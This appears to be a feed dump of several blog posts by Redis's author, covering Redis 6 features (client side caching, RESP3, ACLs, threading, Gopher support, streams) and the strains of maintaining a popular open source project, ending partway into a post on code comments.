I blogged about it here http://antirez.com/news/130, however I think that right now this is the most immature feature of Redis 6. Yep, it’s cool that the server can assist you in caching client side values, but I want to improve this before Redis 6 GA is out. Especially it could be very good to add a new mode that requires the server to maintain no state about clients, or very little state at all, and trade this with more messages. Moreover right now the messages to expire certain “cache slots” can’t be compiled in a single one. There is more work to do in January about this feature, but it will be a good one.

Disque as a module
===

Finally I did it :-) https://github.com/antirez/disque-module, and I’m very happy with the result.
Disque as a module really shows how powerful is the Redis module system at this point. Cluster message bus APIs, ability to block and resume clients, timers, AOF and RDB control of module private data. If you don’t know what Disque is, check the repository: the README is quite extensive.

Cluster Proxy
===

My colleague Fabio worked for months at this Redis Cluster proxy: https://github.com/artix75/redis-cluster-proxy.
It is ages that I want to see it happening, the client landscape is very fragmented when the topic is Redis Cluster support, so now we have a (work in progress) proxy that can do many interesting things. The main one is to abstract the Redis Cluster for clients, like if they were talking to a single instance. Another one is to perform multiplexing, at least when it is simple and clients just use simple commands and features. When there is to block or to perform transactions, the proxy allocates a different set of connections for the client. The proxy is also completely threaded, so it can be a good way in order to maximize the CPU usage in case most of your CPU time is spent in I/O. Check the project README for status and give it a try!

Modules
===

With Redis 6 the modules API is totally at a new level. This is one of the part of Redis that matured faster in our history, because Redis Labs used the modules system from day zero in order to develop very complex stuff, not just trivial examples. Some time ago I started the Disque port, and this also motivated to bring me new features to the modules system. The result is that Redis is really a framework in order to write systems as modules, without having to invent everything from scratch, and being BSD licensed, Redis is really an open platform to write systems.

Internals
===

There are tons of improvements to the Redis internals: the way commands are replicated changed quite a bit, the expires are now using a different algorithm which is faster and more cache obvious.

Status and ETA
===

Today we went RC1, and I hope that between end of March, or at worst, May, you’ll see the GA ready.
Right now Redis 6 is definitely testable and the chance you run into a bug is very small. Yet it includes a ton of code changes, and the new features are composed of new code that nobody ran in production before. So if you find bad things, please report them in the issue system describing at your best what happened.

Thanks everybody that made this release possible and that will work in the next months to bring it to a very stable state.

Oh, I almost forgot! This is the LOLWUT command interactive art for version 6:

img://antirez.com/misc/lolwut6.png

Every run displays a different landscape that is randomly generated. Comments]]>
http://antirez.com/news/131
Client side caching in Redis 6 http://antirez.com/news/130 http://antirez.com/news/130 Thu, 04 Jul 2019 17:10:34 +0000
The New York Redis day was over, I get up at the hotel at 5:30, still pretty in sync with the Italian time zone and immediately went walking on the streets of Manhattan, completely in love with the landscape and the wonderful feeling of being just a number among millions of other numbers. Yet I was thinking at the Redis 6 release with the feeling that, what was probably the most important feature at all, the new version of the Redis protocol (RESP3), was going to have a very slow adoption curve, and for good reasons: wise people avoid switching tools without very good reasons. After all why I wanted to improve the protocol so badly? For two reasons mainly, to provide clients with more semantical replies, and in order to open to new features that were hard to implement with the old protocol; one feature in particular was the most important to me: client side caching.

Rewind back to about one year ago. I arrived at Redis Conf 2018, in San Francisco, with the firm idea that client side caching was the most important thing in the future of Redis. If we need fast stores and fast caches, then we need to store a subset of the information inside the client. It is a natural extension of the idea of serving data with small delays and at a big scale. Actually almost every very large company already does it, because it is the only way to survive to the load eventually. Yet Redis had no way to assist the client in such process. A fortunate coincidence wanted Ben Malec having a talk at Redis Conf exactly about client side caching [1], just using the tools that Redis provides and a number of very clever ideas.

[1] https://www.youtube.com/watch?v=kliQLwSikO4

The approach taken by Ben really opened my imagination. There were two key ideas Ben used in order to make his design work. The first was to use the Redis Cluster idea of “hash slots” in order to divide keys into 16k groups. That way clients would not need to track the validity of each key, but could use a single metadata entry for a group of keys. Ben used Pub/Sub in order to send the notifications when keys where changed, so he needed some help by the application in all its parts, however the schema was very solid. Modify a key? Also publish a message invalidating it. On the client side, are you caching keys? Remember the timestamp at which you cache each key, and also when receiving invalidation messages, remember the invalidation time for each slot. When using a given cached key, do a lazy eviction, by checking if the key you cached has a timestamp which is older than the timestamp of the invalidation received for the slot this key belongs to: in that case the key is stale data, you have to ask the server again.

After watching the talk, I realized that this was a great idea to be used inside the server, in order to allow Redis to do part of the work for the client, and make client side caching simpler and more effective, so I returned home and wrote a document describing my design [2].

[2] https://groups.google.com/d/msg/redis-db/xfcnYkbutDw/kTwCozpBBwAJ

But to make my design working I had to focus on switching the Redis protocol to something better, so I started writing the specification and later the code for RESP3, and the other Redis 6 things like ACL and so forth, and client side caching joined the huge room of the many ideas for Redis that I abandoned in some way or the other for lack of time.

Yet I was among the streets of New York thinking about this idea. Later went to lunch and coffee break with friends from the conference. When I returned to my hotel room I had all the evening left, and most of the next day before the flight, so I started writing the implementation of client side caching for Redis 6, closely following the proposal I wrote to the group one year ago: it still looked great.

Redis server-assisted client side caching, finally called “tracking” (but I may change idea), is a very simple feature composed of just a few key ideas.

The key space is split into “caching slots”, but they are a lot more than the hash slots used by Ben. We use 24 bits of the output of CRC64, so there are a bit more than 16 millions different slots. Why so much? Because I think you want to have a server with 100 millions of keys, and yet an invalidation message should not affect more than a few keys in the client side cache. The memory overhead inside Redis to take the invalidation table is 130 megabyte: an array of 8 bytes pointers to 16M entries. That’s ok with me, if you want the feature you are going to make a great use of all the memory you have in the clients, so to use 130MB server side is fine; what you win is a much more fine grained invalidation.

Clients enable the feature in an “opt in” way, with a simple command:

CLIENT TRACKING on

The server replies the good old +OK, and starting from that moment, every command that is flagged as “read only” in the command table, will not just return the keys to the caller, it will also, as a side effect, remember the caching slots of all the keys the client requested so far (but only the ones using a read only command, that's the agreement between the server and the client). The way Redis stores this information is simple. Each Redis client has an unique ID, so if client ID 123 performs an MGET about keys hashing to the slot 1, 2, and 5, we’ll have the Invalidation Table with the following entry:

1 -> [123]
2 -> [123]
5 -> [123]

But later also client ID 444 will ask about keys in the slot 5, so the table will be like:

5 -> [123, 444]

Now some other client changes some key in the slot 5. What happens is that Redis will check the Invalidation Table, to find that both clients 123 and 444 may have cached keys on that slot. We’ll send an invalidation message to both clients, as a result they will be free to deal with it in any form: either remember with a timestamp the last time the slot was invalidate, and check later in a lazy way the timestamp (or incremental “epoch” if you like it more: it is safer) of the cached object, and evict it based on the comparison. Otherwise the client is free to reclaim the objects directly, by taking a table of what it cached about this specific slot. This approach with a 24 bit hash function is not an issue, because we’ll not have a very long list at all, even when caching tens of millions of keys. After sending the invalidation messages, we can remove the entries from the invalidation table, this way we'll no longer send invalidation messages to those clients until they don't read again keys for such slot.

Note that clients are not forced to really use all the 24 bits of the hash function. They may just use, for instance, 20 bits, and then also shift the invalidation messages slots that Redis sends them. Not sure if there are many good reasons to do that, but in memory constrained systems may be an idea.

If you followed closely what I said, you are thinking that the same connection receives both the normal client replies, and the invalidation messages. This is possible with RESP3, because invalidations are sent as “push” message types. Yet if the client is a blocking one, and not an event driven client, this starts to be complex: the application need some way to read new data from time to time, and that looks complex and fragile. It is perhaps, in that case, much better to use another application thread, and a different client connection, in order to receive the invalidation messages. So you are allowed to do the following:

CLIENT TRACKING on REDIRECT 1234

Basically we can say that all the keys we get with the current connection, we want the invalidation message to be sent to client 1234 instead. Multiple clients may ask to have the invalidation messages redirected to a single client for instance, in case of connection pools. All you need to do is to create this special connection to receive the invalidation messages, call CLIENT ID to know which ID this client connection has, and later enable tracking.

There is one problem left: what happens if we lose the connection with the server from the invalidation link? We may run into troubles since invalidation messages will no longer be received. Normally the application will detect the link is severed, and will reconnect again, flushing the current cache (or taking more soft resolutions, like putting all the timestamps for the slots a few seconds in the future to have some time to populate the cache while serving data that may be a few seconds stale). Yet it may be a better idea if the invalidation thread pings from time to time the connection to make sure it is alive. However in order to reduce the risk of stale data, Redis will also start to inform the clients that redirected the invalidation messages to some other client, that is now disconnected, about the situation, just using special push messages: at the next query performed the client will know.

What I described was just merged into Redis unstable. Probably it’s not the final word, but we have more months before the first Redis 6 release candidate, there is time to change everything: just send me your feedbacks. I’m also looking at ways to enable the feature for RESP2. That would work only when redirection is enabled, and the client listening for messages should probably go into Pub/Sub mode so that we could send kinda of Pub/Sub messages. In this way old clients can be fully reused.

I hope this was enough to stimulate your appetite: if we execute this inside Redis very well, and then document it for the client authors to know how to provide support, data may go a lot nearer to the application than ever, even in applications ran by small teams that so far avoided trying to implement client side caching. For large teams and very large applications doing this already, the overhead could be reduced, together with the complexity of the implementation. Comments]]>
http://antirez.com/news/130
The struggles of an open source maintainer http://antirez.com/news/129 http://antirez.com/news/129 Thu, 16 May 2019 17:42:18 +0000
Flood effect

I don’t believe in acting fast, thinking fast, winning the competition on time and stuff like that. I don’t like the world of constant lack of focus we live in, because of social networks, chats, emails, and a schedule full of activities. So when I used to receive an email about Redis back in the early times of the project, when I still had plenty of time, I was able to focus on what the author of the message was trying to tell me. Then I could recall the relevant part of Redis we were discussing, and finally reply with my real thoughts, after considering the matter with care. I believe this is how most people should work regardless of what their job is.

When a software project reaches the popularity Redis reached, and at the same time once the communications between individuals are made so simple by the new social tools, and by your attitude to be “there” for users, the amount of messages, issues, pull requests, suggestions the authors receive will grow exponentially. At the same time, at least in the case of Redis, but I believe this to be a common problem, the amount of very qualified people that can look at such inputs from the community grows very slowly. This creates an obvious congestion. Most people try to address it in the wrong way: using pragmatism. Let’s close the issue after two weeks of no original poster replies, after we ask some question. Close all the issues that are not very well specified. And other “inbox zero” solutions. The reality is that to process community feedbacks very well you have to take the time needed, otherwise you will just pretend your project has a small number of open issues. Having a lot of resources to hire core-level experts for each Redis subsystem, to work at OSS full time, would work but is not feasible.

So what happens? That you start to prioritize more and more what to look at and what not. And you feel you are a piece of shit at ignoring so many things and people, and also the contributor believes you don’t care about what others have to give you. It’s a complex situation. Usually the end result is to develop an attitude to mostly address critical issues and disregard all the new stuff, since new stuff are yet not in the core, and who wants to have a larger code base with even more PRs and issues there? Maybe also written in a more convoluted way compared to your usual programming style, so, more complexity, and good luck when there is a critical bug there to track the root cause.

Role shifting

As a result of the “flood effect” problem exposed above, you suddenly also change job. Redis became popular because I supposedly am able to design and write software. And now instead most of the work I do is to look at issues and pull requests, and I also feel that I could do better many of the contributions I receive. Some will be better quality than I could do, because there are also better programmers than me contributing to Redis, but *most* for the nature of big numbers will be average contributions that are just written to solve a given problem that was contingent for the folks that submitted it. While, when I design for Redis, I tend to think at Redis as a whole, because it’s years I write this thing. So what you were good at, you have no longer time to do. This in turn means less organic big new features. My solution with that? Sometimes I just stop looking at issues and PRs for weeks, because I’m coding or designing: that is the work I really love and enjoy. However this in turn creates ways more pressure on me, psychologically. To do what I love and I can do well I’ve to feel like shit.

Time

There are two problems related to working at the same project for a prolonged amount of time, at least for me.
First, before of the Redis experience I *never* worked every week day of my life. I could work one week, stop two, then work one month, then disappear for other two months. Always. People need to recharge, get new energy and ideas, to do creative work. And programming at high level is a fucking creative job. Redis itself was created like that for the first two years, that is, when the project evolved at the fastest speed. Because the sum of the productivity of me working just when I want is greater than the productivity I’ve when I’m forced to work every day in a steady way.

However my work ethics allowed me to have a very discontinue schedule when I was working alone with my companies. Once I started to receive money to work at Redis, it was no longer possible for my ethics to have my past pattern, so I started to force myself to work under normal schedules. This for me is a huge struggle, for many years at this point. Moreover I’m sure I’m doing less than I could because of that, but this is how things work. I never found a way to solve this problem. I could say Redis Labs that I want to return to my old schedule, but that would not work because at this point I really “report” to the community, not to the company.

Another problem is that working a lot at the same project is also a complex matter, mentally speaking. I used to change project every six months in the past. Now for ten years I did the same thing. In that regard I tried to save my sanity by having sub-projects inside Redis. One time I did Cluster, another time disk-storage (now abandoned), another was HyerLogLogs, and so forth. Basically things that bring value to the project but that, in isolation, are other stuff. But eventually you have to return back to the issues and PRs page and address the same things every day. “Replica is disconnecting because of a timeout” or whatever. Let’s investigate that again.

Fear

I always had some fear to lose the technological leadership of the project. Not because I think I’m not good enough at designing and evolving Redis, but because I know my ways are not aligned with: 1) what a sizable amount of users want. 2) what most people in IT believe software is. So I had to constantly balance between what I believe to be good design, set of features, speed of development (slow), size of the project (minimal), and what I was expected to deliver by most of the user base. Fortunately there is a percentage of Redis users that understand perfectly the Redis-way, so at least from time to time I can get some word of comfort.

Frictions

Certain people are total assholes. They are everywhere, it is natural and if you ask me, I even believe in programming there are a lot more nice people than in other fields. But yet you’ll always see a percentage of total jerks. As the leader of a popular OSS project, in one way or the other you’ll have to confront with these people, and that’s maybe one of the most stressful things I ever did in the course of the Redis development.

Futileness

Sometimes I believe that software, while great, will never be huge like writing a book that will survive for centuries. Note because it is not as great per-se, but because as a side effect it is also useful… and will be replaced when something more useful is around. I would like to have time to do other activities as well. So sometimes I believe all I’m doing is, in the end, futile. We’ll design and write systems, and new systems will emerge; but anyone that just stays in software, instead of staying in “software big ideas”, will ever set a new mark? From time to time I think I had potentially the ability to work at big ideas but because I focused on writing software instead of thinking about software, I was not able to use my potential in that regard. This is basically the contrary of the impostor syndrome, so I guess I’ve a big idea of myself: sorry for that I should be more humble.

That said, I was able to work for many years doing things I really loved, that gave me friends, recognition, money, so I don’t want to say it was a bad deal. Yet I totally understand people struggling a lot to stay afloat once their projects start to be popular. This blog post is dedicated to them. Comments]]>
http://antirez.com/news/129
Redis streams as a pure data structure http://antirez.com/news/128 http://antirez.com/news/128 Fri, 22 Mar 2019 15:10:15 +0000
## Streams are CSV files on steroids

If you want to log a series of structured data items and decided that databases are overrated after all, you may say something like: let’s just open a file in append only mode, and log every row as a CSV (Comma Separated Value) item:

(open data.csv in append only)
time=1553096724033,cpu_temp=23.4,load=2.3
time=1553096725029,cpu_temp=23.2,load=2.1

Looks simple and people did this for ages and still do: it’s a solid pattern if you know what you are doing. But what is the in-memory equivalent of that? Memory is more powerful than an append only file and can automagically remove the limitations of a CSV file like that:

1. It’s hard (inefficient) to do range queries here.

2. There is too much redundant information: the time is almost the same in every entry and the fields are duplicated. At the same time removing it will make the format less flexible, if I want to switch to a different set of fields.

3. Item offsets are just the byte offset in the file: if we change the file structure the offset will be wrong, so there is no actual true concept of primary ID here. Entries are basically not univocally addressed in some way.

4. I can’t remove entries, but only mark them as no longer valid without the ability of garbage collecting, if not by rewriting the log. Log rewriting usually sucks for several reasons and if it can be avoided, it’s good.

Still such log of CSV entries is also great in some way: there is no fixed structure and fields may change, is trivial to generate, and after all is quite compact as well. The idea with Redis Streams was to retain the good things, but go over the limitations. The result is a hybrid data structure very similar to Redis Sorted Sets: they *feel like* a fundamental data structure, but to get such an effect, internally it uses multiple representations.

## Streams 101 (you may skip that if you know already Redis Stream basics)

Redis Streams are represented as delta-compressed macro nodes that are linked together by a radix tree. The effect is to be able to seek to random entries in a very fast way, to obtain ranges if needed, remove old items to create a capped stream, and so forth. Yet our interface to the programmer is very similar to a CSV file:

> XADD mystream * cpu-temp 23.4 load 2.3
"1553097561402-0"
> XADD mystream * cpu-temp 23.2 load 2.1
"1553097568315-0"

As you can see from the example above the XADD command auto generates and returns the entry ID, which is monotonically incrementing and has two parts:
http://antirez.com/news/128
Gopher: a present for Redis http://antirez.com/news/127 http://antirez.com/news/127 Mon, 25 Feb 2019 17:17:23 +0000
[… here Redis tries to stop the tears, but the emotion is too strong and there are bits (I mean zeros and ones) on the floor …]

WTF are you saying?! should be your automatic question. Gopher in 2019 sounds a bit strange. However it is not *just* a joke, while it is largely a joke. The implementation is just 100 lines of code after all, excluding the external tool to render the pages into Redis keys. But… the thing is that there is really an active community around Gopher, a very small one but one that is growing in the latest years and months. There are people that feel that internet is no longer what it used to be. There is too much control, companies tracking, comments, likes, retweets, to the point that the content is no longer the king. One writes new things for them to be popular for 5 hours and disappear. There is no longer a discussion that can survive more than a few minutes without becoming some kind of flame, unless all the parties self-censor every possible feeling, uneasy word, and belief, to the point to make the discussion quite useless. Finally to load a stupid page with 1k of text requires to load 50 javascript files, to see the screen flickering since client-side rendering is cool, and so forth.

On the other hand Gopher is a text only protocol that is great to deliver text only documents where the stress is in what you write. But that would be fetichism, for me the silver bullet of Gopher is that it is UNCOOL. Uncool enough that it will be forever, AFAIK, an alternative reality where certain folks can decide to separate from the rest, to experience a different way to do things, more similar to the old times of BBSs or the first years of the internet. A place where most people will not want to go just to read nerdy stuff in an 80 columns fixed size font.

What you do in Gopher is to create your Gopher hole, that is, your space inside the Gopher universe, like your web site on the internet basically. There was no shortage of tools to do that already, but Redis is quite nice for a few reasons: you can change the Redis keys to change the site content in real time, that’s handy. You can use replication in order to duplicate a site, and can even just save your RDB file to have an exact copy of the whole Gopher hole to archive for backup or historical reasons.

This Redis Gopher concept was created with the collaboration of Freaknet, a historical hacking laboratory experience here in Catania. https://it.wikipedia.org/wiki/FreakNet.
Those folks do a lot of interesting stuff, including a retrocomputing hardware museum project in Palazzolo Acreide here: https://museo.freaknet.org/en/.

How it works?

Well it’s trivial, I hijacked the inline protocol, and specifically two kind of inline requests that were anyway illegal: an empty request or any request that starts with "/" (there are no Redis commands starting with such a slash). Normal RESP2/RESP3 requests are completely out of the path of the Gopher protocol implementation and are served as usually as well. If you open a connection to Redis when Gopher is enabled and send it a string like "/foo", if there is a key named "/foo" it is served via the Gopher protocol. The whole implementation is 100 lines of code. Initially I thought about using data structures and have semantical transformations to Gopher types, but that’s just complex and useless.

Instead what I did was to provide an authoring tool for Gopher over Redis, you can find it here:

https://github.com/antirez/gopher2redis

To see that example Gopher hole running on a Redis instance just go to gopher://gopher.antirez.com, and btw that will be the address of my Gopher hole once I’ll build one in the next days. P.S. I suggest using the Lynx text only web/gopher browser to access Gopher.

The gopher support is disabled by default, to enable it use the Redis unstable branch and use the “gopher-enabled” option, setting it to yes. However MAKE SURE to also password protect Redis: the Gopher protocol will still serve content, but at the same time normal Redis commands will not be accessible. This way (and assuming you don’t have data other than your Gopher keys to expose in the instance) you could make the instance public, as a true Gopher server.

Well, have fun with Gopher! I hope this Gopher thing will go forward, I really believe there are a few of us that need to create a community outside the chaos of the modern Internet. No, it will not be possible to have no interactions. For instance I’ve no plans to stop blogging or using Internet. But certain slower higher quality communications need a place to prosper. Comments]]>
http://antirez.com/news/127
An update about Redis developments in 2019 http://antirez.com/news/126 http://antirez.com/news/126 Wed, 20 Feb 2019 12:14:11 +0000
— https://news.ycombinator.com/item?id=19204436 —
I love Redis, but I'm a bit skeptical of some of the changes that are currently in development. The respv3 protocol has some features that, while they sound neat, also could significantly complicate client library code. There's also a lot of work going into a granular acl. I can't imagine why this would be necessary, or a higher priority than other changes like multi-thread support, better persistence model, data-types, etc.
— end of user comment —

I’ve the feeling she/he (not sure) is not the only one that looks at ACLs as some sort of feature imposed by the Redis Labs goals, because “enterprise users” or something like that. Also the other points in the comment are interesting, and I believe everything is very well worth addressing in order to communicate clearly with the Redis community what’s the road ahead.

For simplicity I’ll split this blog post into sections addressing every single feature mentioned in the original comment.

## RESP3

The goal of RESP3, as I already blogged in these pages, is to actually simplify the clients landscape. Hopefully every client will have a lower layer that will not try to reinvent some kind of higher level interface: redis.call(“get”,”foo”). There is no longer need to orchestrate conversions because now the protocol is semantical enough to tell the client what a given reply should look like in the hand of the caller, nor any need to know beforehand the command fingerprint for the majority of commands. What I think the user is referring is RESP3 support for out of band communications, that is the reply “attributes”.

I really believe that in the future of Redis “client side caching” will be a big thing. It’s the logical step in every scalable system. However without server assistance client side cache invalidation is a nightmare. This is the reason why RESP3 supports attributes in replies, mainly. However probably Redis 6 *will not implement any of that*. Redis unstable, that will become Redis 6, already has a RESP3 implementation that is almost complete, and there are no attributes. The clients implementing RESP3 can just decide to discard attributes if they are willing to be really future-proof, and likely attributes will not be sent at all anyway even for future Redis versions if the user did not activate some kind of special feature. For instance, for client side caching, the connection will have to be put in some special mode. Moreover, as you know, Redis 6 will be completely backward compatible with RESP2. Actually I’m starting to believe that RESP2 support will never be removed, because it is almost for free, and there is no good reason to break backward compatibility once we did the effort to implement the abstraction layer between RESP2 and RESP3.

Normally I don’t like to change things without a good reason, however RESP2 limitations were having a strong effect on the client ecosystem. I would like to have a client landscape where users, going from one client to the other, will feel at home, and the API will be the Redis API, not the layer that the client author invented. I’m not against an *higher level* API in addition to the lower level one btw, but there should be a common ground, and clients should be able to send commands without knowing anything about such commands.

## ACLs

The ACL specification was redacted by myself four years ago. I waited so much time in order to convince myself this was really the time to implement it: we went a long way without any ACL using just tricks, mainly command renaming. However don’t believe that ACLs main motivation is enterprise customers in need for security. As a side effect, ACLs also allow authentication of users for security purposes, but the main goal of the feature is *operational*.

Let me show you an example. You have a Redis instance and you plan to use the instance to do a new thing: delayed jobs processing. You get a library from the internet, and it looks to work well. Now why on the earth such library, that you don’t know line by line, should be able to call “FLUSHALL” and flush away your database instantly? Maybe the library test will have such command inside and you realize it when it’s too late. Or maybe you just hired a junior developer that is keeping calling “KEYS *” on the Redis instance, while your company Redis policy is “No KEYS command”.

Another scenario, cloud providers: they need to carefully rename the admin commands, and even to mask such commands from being leaked for some reason. More tricks: so MONITOR will not show the commands in the output for instance. With ACLs you can setup Redis so that default users, without some authentication, will be prevented to run anything that is administrative or dangerous. I think this will be a big improvement for operations.

Moreover ACLs is one of the best code I wrote for Redis AFAIK. There is nearly no CPU cost at all, unless you se key patterns, but even so it’s small. The implementation is completely self contained inside the acl.c file, the rest of the core has a handful of calls to the ACL API. No complexity added to the system because it is completely modular. Actually the ACL code allowed to do some good refactoring around the AUTH command.

## Multi threading

There are two possible multi threading supports that Redis could get. I believe the user is referring to “memcached alike” multithreading, that is the ability to scale a single Redis instance to multiple threads in order to increase the operations per second it can deliver in things like GET or SET and other simple commands. This involves making the I/O, command parsing and so forth multi threaded. So let’s call this thing “I/O threading”.

Another multi threaded approach is to, instead, allow slow commands to be executed in a different thread, so that other clients are not blocked. We’ll call this threading model “Slow commands threading”.

Well, that’s the plan: I/O threading is not going to happen in Redis AFAIK, because after much consideration I think it’s a lot of complexity without a good reason. Many Redis setups are network or memory bound actually. Additionally I really believe in a share-nothing setup, so the way I want to scale Redis is by improving the support for multiple Redis instances to be executed in the same host, especially via Redis Cluster. The things that will happen in 2019 about that are two:

A) Redis Cluster multiple instances will be able to orchestrate to make a judicious use of the disk of the local instance, that is, let’s avoid an AOF rewrite at the same time.

B) We are going to ship a Redis Cluster proxy as part of the Redis project, so that users are able to abstract away a cluster without having a good implementation of the Cluster protocol client side.

Another thing to note is that Redis is not Memcached, but, like memcached, is an in-memory system. To make multithreaded an in-memory system like memcached, with a very simple data model, makes a lot of sense. A multi-threaded on-disk store is mandatory. A multi-threaded complex in-memory system is in the middle where things become ugly: Redis clients are not isolated, and data structures are complex. A thread doing LPUSH need to serve other threads doing LPOP. There is less to gain, and a lot of complexity to add.

What instead I *really want* a lot is slow operations threading, and with the Redis modules system we already are in the right direction. However in the future (not sure if in Redis 6 or 7) we’ll get key-level locking in the module system so that threads can completely acquire control of a key to process slow operations. Now modules can implement commands and can create a reply for the client in a completely separated way, but still to access the shared data set a global lock is needed: this will go away.

## Better persistence

Recently we did multiple efforts in order to improve this kind of fundamental functions of Redis. One of the best thing that was implemented lately is the RDB preamble inside the AOF file. Also a lot of work went both in Redis 4 and 5 about replication, that is now completely at another level compared to what it used to be. And yes, it is still one of my main focus to improve such parts.

## Data structures

Now Redis has Streams, starting with Redis 5. For Redis 6 and 7 what is planned is, to start, to make what we have much more memory efficient by changing the implementations of certain things. However to add new data structures there are a lot of considerations to do. It took me years to realize how to fill the gap, with streams, between lists, pub/sub and sorted sets, in the context of time series and streaming. I really want Redis to be a set of orthogonal data structures that the user can put together, and not a set of *tools* that are ready to use. Streams are an abstract log, so I think it’s a very worthwhile addition. However other things I’m not completely sure if they are worth to be inside the core without a very long consideration. Anyway in the latest years there was definitely more stress in adding new data structures. HyperLogLogs, more advanced bit operations, streams, blocking sorted set operations (ZPOP* and BZPOP*), and streams are good examples.

## Conclusions

I believe that the Redis community should be aware about why something is done and why something is instead postponed. I do the error to communicate a lot via Twitter like if everybody is there, but many people happen to have a life :-D and don’t care. The blog is a much better way to inform the community, I need to take the time to blog more. Incidentally I love to write posts, so it’s a win-win. An important thing to realize is that Redis has not a solid roadmap, over the years I found that opportunistic development is a huge win over having a roadmap. Something is demanded? I see the need? I’m in the mood to code it? It’s the right moment because there are no other huge priorities? There are a set of users that are helping the design process, giving hints, ideas, testing stuff? It’s the right moment, let’s do it. To have a solid roadmap for Redis is silly because the size of the OSS core team is small, sometimes I remain stuck with some random crash for weeks… Any fixed long term plan would not work. Moreover as the Redis community gives feedbacks my ideas change a lot, so I would rewrite the roadmap every month. Yet blogging is a good solution to at least show what is the current version of the priorities / ideas, and to show why other ideas were abandoned.

A final note: the level of freedom I've with Redis Labs about what to put inside the open source project side is almost infinite. I think this is kinda of a miracle in the industry, or just the people I work with at Redis Labs are nice folks that understand that what we are doing originated from the open source movement and is wise to keep it going in that way. But it's not a common thing. If I do errors in the Redis roadmap they are surely my errors. Comments]]>
http://antirez.com/news/126
Why RESP3 will be the only protocol supported by Redis 6 http://antirez.com/news/125 http://antirez.com/news/125 Fri, 09 Nov 2018 15:31:10 +0000 from Stack Overflow suggested that we could just switch protocol for backward compatibility per-connection, sending a command to enable RESP3. That means no longer need for a global configuration that switches the behavior of the server. Put in that way it is a lot more acceptable for me, and I'm reconsidering the essence of the blog post]

A few weeks after the release of Redis 5, I’m here starting to implement RESP3, and after a few days of work it feels very well to see this finally happening. RESP3 is the new client-server protocol that Redis will use starting from Redis 6. The specification at https://github.com/antirez/resp3 should explain in clear terms how this evolution of our old protocol, RESP2, should improve the Redis ecosystem. But let’s say that the most important thing is that RESP3 is more “semantic” than RESP2. For instance it has the concept of maps, sets (unordered lists of elements), attributes of the returned data, that may augment the reply with auxiliary information, and so forth. The final goal is to make new Redis clients have less work to do for us, that is, just deciding a set of fixed rules in order to convert every reply type from RESP3 to a given appropriate type of the client library programming language.

In the future of Redis I see clients that are smarter under the hood, trying to do their best in order to handle connections, pipelining, and state, and apparently a lot more simpler in the user-facing side, to the point that the ideal Redis client is like:

result = redis.call(“GET”,keyname);

Of course on top of that you can build more advanced abstractions, but the bottom layer should look like that, and the returned reply should not require any filtering that is ad-hoc for specific commands: RESP3 return type should contain enough information to return an appropriate data type. So HGETALL will return a RESP3 “map”, while LRANGE will return an “array”, and EXISTS will return a RESP3 “boolean”.

This also allows new commands to work as expected even if the client library was not *specifically* designed to handle it. With RESP2 instead what happened was that likely the command worked using mechanisms like "method missing" or similar, but later when the command was *really* implemented in the client library, the returned type changed, introducing a subtle incompatibility.

However, while the new protocol is an incremental improvement over the old one, it will introduce breaking incompatibilities in the client-library side (of course) and *in the application layer* as well. Because for instance, ZSCORE will now return a double, and not a string, so application code should be updated, or, alternatively, client libraries could implement a compatibility option that will turn the RESP3 replies back to their original RESP2 types.

Lua scripts will also no longer work if not modified for the new protocol, because also Lua will see more semantical types returned by the redis.call() command. Similarly Lua will be able to return all the new data types implemented in RESP3.

Because of all that, people are scared about my decision: I’m going to ship Redis 6 with support for *only* RESP3. There will be no compatibility mode to switch a Redis 6 server to RESP2, so you either upgrade your client library and upgrade your application (or use the client library backward compatibility mode), or you cannot switch to Redis 6.

I’ve good reasons to do so, and I want to explain why I’m taking this decision, and how I’m mitigating the problems for users and client library authors. Let’s start from the mitigations:

* Redis 5 will be fully supported for 2 years after the release of Redis 6. Everything critical will be back-ported to Redis 5 and patch-level releases will be available constantly.

* Redis 6 is expected to be released in about 1 or 1.5 years. However Redis 6 will be switched to RESP3 in about 1 month. So people will use, experiment, and deal with an unstable Redis version that uses the new protocol for a lot of time. Given that unlike many other softwares, Redis unstable has a lot of casual users, both because it’s the default branch on Github, and because traditionally Redis unstable is never really so unstable, this will grant a lot of prior exposure.

* I’m still not 100% sure about that, but the Lua scripting engine may have a compatibility mode in order to return the same types as of Redis 5. The compatibility however will not be enabled by default, and will be opt-in for each script executed, by calling a special redis.resp2_compat() function before calling Redis commands. So every Redis 6 server will behave the same regardless of its configuration, as Redis always did in the last 10 years.

Those are the mitigations. And this is, instead, why I’ll not have Redis 6 supporting both versions:

1) It is more or less completely useless. If people switch Redis 6 to RESP2 mode, they are still in the past and are just waiting for Redis 7 to go out without RESP2 support and break everything. In the meantime, when you deal with a Redis 6 installation, you never know *what it replies*, depending on how it is configured. So the same client library may return an Hash or an Array for the same command.

2) It’s more work and more complexity without a good reason (see “1”). Many commands will require a check for the old protocol in order to see in what format to reply.

3) By binding the new Redis 6 features together with a protocol change, we are giving good reasons to users to do the switch and port their clients and applications. At some point everything will be over and we can focus on new things. Otherwise we’ll have a set of Redis 6 users that switched to the new server for the new features but are still with the old protocol, and Redis 7 will be the same drama again.

4) If somebody tells you that adapting the client libraries is a terrible work, well, I’ll beg to differ. Yes, there is some change to do, but now that I’m implementing the server side, I see that it’s not so terrible. What is terrible instead is that most client work is not payed at all and happens just because of passion and willingness to share with others. I bet that we’ll see many implementations of RESP3 in short time.

5) RESP3 is designed so that clients can automatically detect if it’s RESP2 or RESP3, and switch, so new clients will work both with Redis <= 5 and Redis 6.

Well that’s all. I hope it clarifies my point of view and the reasons behind it, and also at the same time the mitigations that will be enabled during the protocol switch may serve to convince users that it will not be a very “hard” breakage. Comments]]>
http://antirez.com/news/125
Writing system software: code comments. http://antirez.com/news/124 http://antirez.com/news/124 Sat, 06 Oct 2018 20:08:58 +0000
Not everybody thinks likewise. Many believe that comments are useless if the code is solid enough. The idea is that when everything is well designed, the code itself documents what the code is doing, hence code comments are superfluous. I disagree with that vision for two main reasons:

1. Many comments don't explain what the code is doing. They explain what you can't understand just from what the code does. Often this missing information is *why* the code is doing a certain action, or why it’s doing something that is clear instead of something else that would feel more natural.

2. While it is not generally useful to document, line by line, what the code is doing, because it is understandable just by reading it, a key goal in writing readable code is to lower the amount of effort and the number of details the reader should take into her or his head while reading some code. So comments can be, for me, a tool for lowering the cognitive load of the reader.

The following code snippet is a good example of the second point above. Note that all the code snippets in this blog post are obtained from the Redis source code. Every code snipped is presented prefixed by the file name it was extracted from. The branch used is the current "unstable" with hash 32e0d237.

scripting.c:
/* Initial Stack: array */
lua_getglobal(lua,"table");
lua_pushstring(lua,"sort");
